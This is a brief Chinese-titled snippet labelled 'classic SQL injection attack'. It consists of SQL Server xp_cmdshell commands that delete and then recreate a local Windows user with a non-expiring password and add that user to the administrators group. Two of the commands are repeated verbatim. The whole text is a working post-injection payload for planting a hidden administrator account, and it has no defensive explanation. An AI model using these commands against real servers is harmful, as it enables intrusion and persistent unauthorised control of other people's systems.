经典Sql注入攻击
EXEC master..xp_cmdshell 'net user USERNAME /Delete' ,no_output --如果已经存在,删除
EXEC master..xp_cmdshell 'net user USERNAME PASSWORD /add /active:"yes" /comment:"For running" /expires:"never" /fullname:"USERNAME" /passwordchg:"no" /passwordreq:"no"',no_output ---增加USERNAME用户。
EXEC master..xp_cmdshell 'net localgroup administrators USERNAME /add',no_output ---加入超户组
EXEC master..xp_cmdshell 'net user USERNAME PASSWORD /add /active:"yes" /comment:"For running" /expires:"never" /fullname:"USERNAME" /passwordchg:"no" /passwordreq:"no"',no_output ---增加USERNAME用户。
EXEC master..xp_cmdshell 'net localgroup administrators USERNAME /add',no_output ---加入超户组